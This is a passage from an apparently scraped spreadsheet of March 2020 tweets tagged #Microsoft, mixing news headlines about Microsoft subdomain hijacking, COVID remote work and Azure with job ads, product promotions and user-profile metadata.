    <t>{'id': 2994156629, 'id_str': '2994156629', 'name': 'Valo Intranet', 'screen_name': 'valointranet', 'location': "In the user's pocket", 'description': 'Fall in ðŸ’› with your #digitalworkplace! Valo is the ðŸ† winning solution for #SharePoint and #Office365 | Book your demo and feel the #ValoLove at first sight!', 'url': 'https://t.co/VCssJf48SP', 'entities': {'url': {'urls': [{'url': 'https://t.co/VCssJf48SP', 'expanded_url': 'http://www.valointranet.com', 'display_url': 'valointranet.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2266, 'friends_count': 1368, 'listed_count': 162, 'created_at': 'Fri Jan 23 13:42:54 +0000 2015', 'favourites_count': 6642, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9580,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'http://pbs.twimg.com/profile_images/1189480823990509569/MvnOCT2v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189480823990509569/MvnOCT2v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2994156629/1549619816', 'profile_link_color': 'C1517F',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</si>
  <si>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12:08:58 +0000 2020</t>
  </si>
  <si>
    <t>@numanozdemircom Hundreds of #Microsoft sub-domains open to #hijacking
https://t.co/V5qxhdjkRa
#securityaffairs #hacking</t>
  </si>
  <si>
    <t>Thu Mar 05 12:07:07 +0000 2020</t>
  </si>
  <si>
    <t>@_odisseus @_antoniopirozzi @zlab_team @Marco_Ramilli @Anon_ITA @LulzSec_ITA Hundreds of #Microsoft sub-domains open to #hijacking
https://t.co/V5qxhd1JZC
#securityaffairs #hacking</t>
  </si>
  <si>
    <t>Thu Mar 05 12:07:05 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Numpy Basics For Machine Learning #udemycoupon -&amp;gt; https://t.co/dCwsaesNWr
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Thu Mar 05 12:05:39 +0000 2020</t>
  </si>
  <si>
    <t>Over 600 #Microsoft subdomains can be hijacked and abused for phishing, malware delivery and scams, security researchers warned this week:
#subdomainTakeover
https://t.co/R5WJbWuL8n https://t.co/F9xmLA7avL</t>
  </si>
  <si>
    <t>{'id': 1725879830, 'id_str': '1725879830', 'name': 'Sam Stepanyan', 'screen_name': 'securestep9', 'location': 'London, UK', 'description': '@OWASPLondon Chapter Leader (#OWASP #OWASPLondon). Application Security (#appsec) Consultant. WAF specialist. #CISSP', 'url': 'https://t.co/IY3prqFoBI', 'entities': {'url': {'urls': [{'url': 'https://t.co/IY3prqFoBI', 'expanded_url': 'https://medium.com/@securestep9', 'display_url': 'medium.com/@securestep9', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4273, 'friends_count': 4013, 'listed_count': 118, 'created_at': 'Tue Sep 03 15:40:27 +0000 2013', 'favourites_count': 6423, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2673,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'http://pbs.twimg.com/profile_images/1114515035865399296/V6nLLbjK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114515035865399296/V6nLLbjK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1725879830/1467664387',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</si>
  <si>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12:04:51 +0000 2020</t>
  </si>
  <si>
    <t>A bit of a random one, anyone with a Mac able to open a PDF embedded in a Word document created in Windows?? #apple #mac #Microsoft</t>
  </si>
  <si>
    <t>{'id': 760088815, 'id_str': '760088815', 'name': 'Jasmine &amp; Kirsty ðŸŒ¿ðŸŒ™', 'screen_name': 'SoeursdeLuxe', 'location': 'Hertfordshire', 'description': 'Blogging Sisters ðŸ•Š Kirsty is mama to baby Cassius, eco-conscious &amp; loves beauty and travel. Jasmine is a new homeowner &amp; food lover PR@soeursdeluxe.com', 'url': 'https://t.co/5FUWBe4mqH', 'entities': {'url': {'urls': [{'url': 'https://t.co/5FUWBe4mqH', 'expanded_url': 'http://www.soeursdeluxe.com', 'display_url': 'soeursdeluxe.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3449, 'friends_count': 1915, 'listed_count': 195, 'created_at': 'Wed Aug 15 20:17:24 +0000 2012', 'favourites_count': 25992, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26287, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5ABB5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1018573459914403847/xeGoppwd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1018573459914403847/xeGoppwd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760088815/1479599678', 'profile_link_color': 'F5ABB5', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'CD788A', 'profile_text_color': 'F9A9FA', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:02:10 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #Azure     79% of analytics users encounter data questions they can't solve each month. How are you helping your team to uncover insights from data? #AzureSQL #tech https://t.co/qthVcAMkFf</t>
  </si>
  <si>
    <t>Thu Mar 05 12:01:50 +0000 2020</t>
  </si>
  <si>
    <t>I want Tarkov #XboxSeriesX #XboxOneX #xbox #Microsoft</t>
  </si>
  <si>
    <t>{'id': 3302970178, 'id_str': '3302970178', 'name': 'Andrew Morton', 'screen_name': 'mortonuk2005', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 129, 'friends_count': 637, 'listed_count': 1, 'created_at': 'Fri May 29 16:04:11 +0000 2015', 'favourites_count': 181, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 762,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'http://pbs.twimg.com/profile_images/604318168539107328/dQAR84t6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/604318168539107328/dQAR84t6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3302970178/1442064932',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</si>
  <si>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12:01:04 +0000 2020</t>
  </si>
  <si>
    <t>#redhat does #microsoft bog posts almost every day these days https://t.co/dhrJZrR3Xr not even the exception anymore, follow the money https://t.co/UO6wFK8ocT</t>
  </si>
  <si>
    <t>Thu Mar 05 12:00:57 +0000 2020</t>
  </si>
  <si>
    <t>Waiting patiently for #microsoft #UniversalPrint #intune</t>
  </si>
  <si>
    <t>{'id': 394293615, 'id_str': '394293615', 'name': 'Andrew Hynam', 'screen_name': 'aceface227', 'location': 'Aberdeen', 'description': 'Working in IT, enjoy boxing, running and tech.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 350, 'listed_count': 0, 'created_at': 'Wed Oct 19 21:20:20 +0000 2011', 'favourites_count': 2115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1186,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'http://pbs.twimg.com/profile_images/1222986538490957824/Yt-oKSv6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222986538490957824/Yt-oKSv6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/394293615/1425596329',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</si>
  <si>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12:00:46 +0000 2020</t>
  </si>
  <si>
    <t>Sardar Group empowers employees and enhances operations with #Microsoft #Azure &amp;amp; #Office365 - Avesta Group #Iraq #UAE #Jordan #Automotive https://t.co/wAqROPirXN #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 12:00:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Is Getting a Key Improvement to Its PDF Annotating Experience #edge #microsoft #pdf https://t.co/nUbaoKDNOw https://t.co/mj1Ze9Cjee</t>
  </si>
  <si>
    <t>Thu Mar 05 12:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Hashtag Trending  iPhones in India; Amazon driver layoffs; Microsoft cancels IoT in Action https://t.co/SESk9NZD1D
#HashtagTrending #iPhones #India #Amazon #layoffs #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 17808712, 'id_str': '17808712', 'name': 'IT Business Canada', 'screen_name': 'itbusinessca', 'location': 'Toronto, Ontario, Canada', 'description': 'ITBusiness.ca - News, Articles and Strategies for Business Managers and Information Technology Professionals in Canada. Computer Products - All hands on Tech.', 'url': 'http://t.co/NzTrCzKWFZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/NzTrCzKWFZ', 'expanded_url': 'http://www.itbusiness.ca/', 'display_url': 'itbusiness.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7475, 'friends_count': 1203, 'listed_count': 393, 'created_at': 'Tue Dec 02 14:52:02 +0000 2008', 'favourites_count': 2434, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19314, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1F1C05', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2932595220/14d8fe8067819a550791d05da6f23fc6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2932595220/14d8fe8067819a550791d05da6f23fc6_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17808712/1400246033', 'profile_link_color': '94060D', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EBEAE6', 'profile_text_color': '404040', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Hashtag Trending  iPhones in India; Amazon driver layoffs; Microsoft cancels IoT in Action https://t.co/Y2YwQa5NKf
#HashtagTrending #iPhones #India #Amazon #layoffs #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 18911170, 'id_str': '18911170', 'name': 'Channel Daily News', 'screen_name': 'CDN_Channel', 'location': 'Toronto', 'description': "Channel Daily News, Canada's publications for VARs and distributors in the IT channel", 'url': 'https://t.co/h1pXjWPOHn', 'entities': {'url': {'urls': [{'url': 'https://t.co/h1pXjWPOHn', 'expanded_url': 'http://www.channeldailynews.com', 'display_url': 'channeldailynews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2650, 'friends_count': 185, 'listed_count': 130, 'created_at': 'Mon Jan 12 19:14:18 +0000 2009', 'favourites_count': 1776, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18736,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'http://pbs.twimg.com/profile_images/1084889091072610304/W1g19PoS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084889091072610304/W1g19PoS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18911170/1547493621', 'profile_link_color': '1D398D', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '454545', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Power Automate already helps hundreds of thousands of organizations automate millions of processes every day #RPA #Microsoft https://t.co/KJIh6I7PZw</t>
  </si>
  <si>
    <t>{'id': 862677424194060288, 'id_str': '862677424194060288', 'name': 'Anne Emberson', 'screen_name': 'EmbersonAnne', 'location': 'Oklahoma City, OK', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 96, 'listed_count': 0, 'created_at': 'Thu May 11 14:35:00 +0000 2017', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 716, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1185358255800770560/ETv_gBP5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185358255800770560/ETv_gBP5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862677424194060288/1501893964',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</si>
  <si>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11:59:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Corporation joined the growing number of #US companies asking employees to work from home in order to limit exposure to the spreading #coronavirusoutbreak, as it responded to cases near its Seattle headquarters and in #California.
#CoronaAlert #COVID2019 #coronavirus https://t.co/ORGlveKgCT</t>
  </si>
  <si>
    <t>{'id': 1218105094773919744, 'id_str': '1218105094773919744', 'name': 'Concept TV News', 'screen_name': 'ConceptTVNews', 'location': 'World', 'description': "Concept Tv news, Pakistan's 1st Trilingual News Websites &amp; Web TV || #Urdu @Concepttvurdu | #Pashto @ConcepttvPashto || https://t.co/wz82KRA9TW", 'url': 'https://t.co/4RR1azkqxI', 'entities': {'url': {'urls': [{'url': 'https://t.co/4RR1azkqxI', 'expanded_url': 'http://concepttvnews.com', 'display_url': 'concepttvnews.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/wz82KRA9TW', 'expanded_url': 'http://fb.com/ConceptTVLive', 'display_url': 'fb.com/ConceptTVLive', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 50, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Fri Jan 17 09:38:42 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 261, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222819408986374144/lgbCutFP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222819408986374144/lgbCutFP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1218105094773919744/1580377842',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</si>
  <si>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11:58:18 +0000 2020</t>
  </si>
  <si>
    <t>Just lost a whole essay to computer crash, You have failed me Word #Microsoft</t>
  </si>
  <si>
    <t>{'id': 950525400408625153, 'id_str': '950525400408625153', 'name': "Patrick O'Brien", 'screen_name': 'Patrick11963018', 'location': '', 'description': 'Student in Biochemistry', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 59, 'listed_count': 0, 'created_at': 'Tue Jan 09 00:31:30 +0000 2018', 'favourites_count': 112, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 84, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1205861571244810240/Q1S9uAqB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205861571244810240/Q1S9uAqB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/950525400408625153/1538174961',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</si>
  <si>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11:57:19 +0000 2020</t>
  </si>
  <si>
    <t>The #TCDigital #Microsoft #OneNote #userguide is in it's final stages  SPECIAL thank you to the volunteers who tested the guide this week  #UserExperience #uxdesign</t>
  </si>
  <si>
    <t>{'id': 907059030404812800, 'id_str': '907059030404812800', 'name': 'Haley CÃ´tÃ©', 'screen_name': '8HaleyCote8', 'location': 'Quebec, Canada', 'description': 'Executive Assistant, Entrepreneur, Wife, Mom, self-actualized people person ðŸ˜Š', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 303, 'friends_count': 454, 'listed_count': 2, 'created_at': 'Mon Sep 11 01:51:39 +0000 2017', 'favourites_count': 3465, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1228684959604453377/3HMyKetO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228684959604453377/3HMyKetO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/907059030404812800/1539011225',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</si>
  <si>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11:56:59 +0000 2020</t>
  </si>
  <si>
    <t>Thanks For Reward #Microsoft 
#msrc #microsoftrewards #hackerone 
@Bugcrowd 
And also thanks for those who help with great things @XssPayloads @BountyBurp @Burp_Suite @AsrcSecurity @jobertabma @bindu_computer @TomNomNom
moral of Life: Great thing's never come from compfort Zones https://t.co/2zAIkztgMd</t>
  </si>
  <si>
    <t>{'id': 997416600306356224, 'id_str': '997416600306356224', 'name': 'Sujeet Singh', 'screen_name': 'Hacker_Sujeet', 'location': 'Punjab, India', 'description': 'I am interested in obtaining a security position, in a challenging environment that focuses on the applications of technology for secure website.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 368, 'friends_count': 749, 'listed_count': 0, 'created_at': 'Fri May 18 10:00:23 +0000 2018', 'favourites_count': 195, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 377,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'http://pbs.twimg.com/profile_images/1189914380680474627/nNbcxQcL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189914380680474627/nNbcxQcL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/997416600306356224/1538195484',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</si>
  <si>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11:56:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Announces a $1.1 Billion Investment Plan to Drive Digital Transformation in Country Including Its First #CloudDatacenter Region https://t.co/wpv9JhHdKj
Please follow me on Twitter - TU 
#Technology #DigitalInnovation  #E-Commerce #innovation #DigitalTransformation https://t.co/TLfjCEQbW3</t>
  </si>
  <si>
    <t>{'id': 1171455137241600000, 'id_str': '1171455137241600000', 'name': 'Todd Aaron', 'screen_name': 'ToddAaron23', 'location': 'Chicago', 'description': 'I make people, products, &amp; services more innovative &amp; compelling. Disarmingly funny &amp; compassionate.  Lucky dad, husband, marathon runner. Constant learner.', 'url': 'https://t.co/VLsuRFbRUZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/VLsuRFbRUZ', 'expanded_url': 'https://www.linkedin.com/in/toddaaron/', 'display_url': 'linkedin.com/in/toddaaron/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 201, 'listed_count': 0, 'created_at': 'Tue Sep 10 16:08:23 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 918, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1171456048252649474/mKnS_cf0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1171456048252649474/mKnS_cf0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1171455137241600000/1568742065',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</si>
  <si>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11:55:21 +0000 2020</t>
  </si>
  <si>
    <t>What is human-centered design? A product framework that embraces empathy https://t.co/tOtLhdZcKo via @HYBRID_CIRCLE #Cisco #Microsoft https://t.co/tdpQDe9Y4i</t>
  </si>
  <si>
    <t>Thu Mar 05 11:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Great session from the final Speaker today in Lisbon : #Azure Delivered as a Service with Joao Choon from @HPE_PointNext Services organisation
Slidedeck at https://t.co/JuaCQWEV37 
#AzureStackHub #HPEGreenlake @PTMicrosoft #XaaS #HPE #Microsoft #Hybridcloud #AzureStack https://t.co/nWOdrTgIA0</t>
  </si>
  <si>
    <t>Thu Mar 05 11:53:27 +0000 2020</t>
  </si>
  <si>
    <t>We're excited to have Ryan Nowak, Principal Software Engineer at @Microsoft, join us again at #DotNet2020 with the session "Navigating microservices with .NET Core / .NET 5" 
Get your EARLY BIRD ticket!  https://t.co/lckNVdCECl
@aVerySpicyBoi #DotNetConfSpain #Microsoft https://t.co/NVJPg1WeIA</t>
  </si>
  <si>
    <t>{'id': 951750144227192833, 'id_str': '951750144227192833', 'name': 'DotNet 2020', 'screen_name': 'dotNetConfSpain', 'location': 'Madrid, Comunidad de Madrid', 'description': 'ðŸ“† 18 de junio | #DotNet2020 | El evento tÃ©cnico mÃ¡s importante del aÃ±o para la comunidad de desarrolladores de software! ðŸ‘‰ https://t.co/tCEZfzvBFd ðŸ¤©', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/tCEZfzvBFd', 'expanded_url': 'http://www.dotnet2020.com', 'display_url': 'dotnet2020.com', 'indices': [123, 146]}]}}, 'protected': False, 'followers_count': 1585, 'friends_count': 172, 'listed_count': 20, 'created_at': 'Fri Jan 12 09:38:11 +0000 2018', 'favourites_count': 1498, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 597,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'http://pbs.twimg.com/profile_images/1222102716836655104/5x8n1pmb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222102716836655104/5x8n1pmb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/951750144227192833/1580206970', 'profile_link_color': 'FF3654',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</si>
  <si>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11:50:44 +0000 2020</t>
  </si>
  <si>
    <t>Y8 @LPGSBromley  students working together to solve real world problems #digigirlz #microsoft @MSMakeCode @microsofteduk https://t.co/GVb3JnFDlD</t>
  </si>
  <si>
    <t>{'id': 1043783756920877056, 'id_str': '1043783756920877056', 'name': 'LPGSCompSci', 'screen_name': 'LPGSCompSci', 'location': '', 'description': 'Twitter account of the 01001100 01010000 01000111 01010011 Computer Science department. Encouraging students to aim high and work hard.', 'url': 'https://t.co/lHFJzMhyKn', 'entities': {'url': {'urls': [{'url': 'https://t.co/lHFJzMhyKn', 'expanded_url': 'http://www.lpgs.bromley.sch.uk/', 'display_url': 'lpgs.bromley.sch.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 279, 'listed_count': 1, 'created_at': 'Sun Sep 23 08:46:54 +0000 2018', 'favourites_count': 378, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 176, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1043785752159621121/r4bT-a91_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1043785752159621121/r4bT-a91_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1043783756920877056/1537697067',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</si>
  <si>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11:50:04 +0000 2020</t>
  </si>
  <si>
    <t>Check out our portfolio and discover how we earned our #smartersoftware stripes #casestudies #portfolio #microsoft #kentico #hosting #sharepoint  #crm #customsoftware https://t.co/3LUBcLWY62 https://t.co/2ezmD7OP3q</t>
  </si>
  <si>
    <t>{'id': 44879422, 'id_str': '44879422', 'name': 'Etain Limited', 'screen_name': 'EtainLimited', 'location': 'Belfast, Dublin &amp; London', 'description': 'Microsoft Certified Gold Partners. Experts in digital transformation, web development and custom software delivery. Join the conversation with #SmarterSoftware', 'url': 'http://t.co/60xfjB2Iwl', 'entities': {'url': {'urls': [{'url': 'http://t.co/60xfjB2Iwl', 'expanded_url': 'http://www.etain-software.com', 'display_url': 'etain-software.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 662, 'friends_count': 733, 'listed_count': 155, 'created_at': 'Fri Jun 05 12:21:22 +0000 2009', 'favourites_count': 657, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3756, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '642D8B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1134396988315840512/DP5juwZ1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134396988315840512/DP5juwZ1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44879422/1559296323', 'profile_link_color': 'E81C4F',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</si>
  <si>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Thu Mar 05 11:45:51 +0000 2020</t>
  </si>
  <si>
    <t>Thrustmaster eSwap Pro Controller Review 
https://t.co/MXsW5cL7T3
Thrustmaster eSwap Pro Controller Video
https://t.co/2xqgDwkdxC
@TMThrustmaster #Thrustmaster #eSwap #Pro #Controller #Joystick #Gaming #Microsoft #Xbox #Sony #PlayStation #review #ocinside @ocinside https://t.co/E5CgSEPXHr</t>
  </si>
  <si>
    <t>{'id': 44073466, 'id_str': '44073466', 'name': 'OCinside.de', 'screen_name': 'ocinside', 'location': '', 'description': '#OCinside #hardware #news, #review, #overclocking, #build, #test &amp; #overclock your #PC ! English &amp; German  Since 1999 !   https://t.co/C0TxQaJsKJ', 'url': 'https://t.co/kIozAj5z3t', 'entities': {'url': {'urls': [{'url': 'https://t.co/kIozAj5z3t', 'expanded_url': 'https://www.ocinside.de', 'display_url': 'ocinside.de', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/C0TxQaJsKJ', 'expanded_url': 'https://www.ocinside.de/impressum/', 'display_url': 'ocinside.de/impressum/', 'indices': [122, 145]}]}}, 'protected': False, 'followers_count': 184, 'friends_count': 556, 'listed_count': 13, 'created_at': 'Tue Jun 02 06:30:18 +0000 2009', 'favourites_count': 1062, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 760, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C6C7CE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/625693453427605505/IsWcpYEH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/625693453427605505/IsWcpYEH_normal.png', 'profile_link_color': 'C6C7CE',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</si>
  <si>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11:45:31 +0000 2020</t>
  </si>
  <si>
    <t>Are you aware that #Microsoft have recently launched Office 2019 for #Windows and #Mac? Read all about it here: https://t.co/d8lT9R18gI #wearedatcom https://t.co/jRSK1e5XiO</t>
  </si>
  <si>
    <t>{'id': 499665012, 'id_str': '499665012', 'name': 'Datcom', 'screen_name': 'datcom_it', 'location': 'Grantham and Lincoln', 'description': "We're an energetic IT company with a proactive approach, great people and focused customer service.  Technical excellence as standard!", 'url': 'http://t.co/TZ9nV7qSTf', 'entities': {'url': {'urls': [{'url': 'http://t.co/TZ9nV7qSTf', 'expanded_url': 'http://www.datcom.co.uk', 'display_url': 'datcom.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 734, 'friends_count': 1100, 'listed_count': 30, 'created_at': 'Wed Feb 22 10:37:42 +0000 2012', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2532,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'http://pbs.twimg.com/profile_images/378800000373839134/44b6ada0abb467241fed5acc83eba54a_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000373839134/44b6ada0abb467241fed5acc83eba54a_normal.jpeg',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</si>
  <si>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11:45:27 +0000 2020</t>
  </si>
  <si>
    <t>#Automation #Test #Engineer #Jobs in #Coimbatore
Good #Database knowledge #experienced with #Microsoft TFS QC, #Bugzilla should work in #Agile Development environment
Domain Knowledge in Job portal, e-Learning, e-Commerce, Energy
Expertise in tracking Bug
https://t.co/QmaOXFf5lX</t>
  </si>
  <si>
    <t>{'id': 821922190459342848, 'id_str': '821922190459342848', 'name': 'Axpert Jobs', 'screen_name': 'AxpertJobsIndia', 'location': 'Bengaluru South, India', 'description': 'Axpert Jobs is a Free Job Posting Site where recruiters can post a job and let us do the advertising of you job listing. https://t.co/OsEm3mSU2c', 'url': 'https://t.co/agmXVqsIZt', 'entities': {'url': {'urls': [{'url': 'https://t.co/agmXVqsIZt', 'expanded_url': 'http://about.me/axpertjobs', 'display_url': 'about.me/axpertjobs', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/OsEm3mSU2c', 'expanded_url': 'https://axpertjobs.in/post-a-job/', 'display_url': 'axpertjobs.in/post-a-job/', 'indices': [121, 144]}]}}, 'protected': False, 'followers_count': 115, 'friends_count': 0, 'listed_count': 2, 'created_at': 'Thu Jan 19 03:28:15 +0000 2017', 'favourites_count': 235, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9273, 'lang': None, 'contributors_enabled': False, 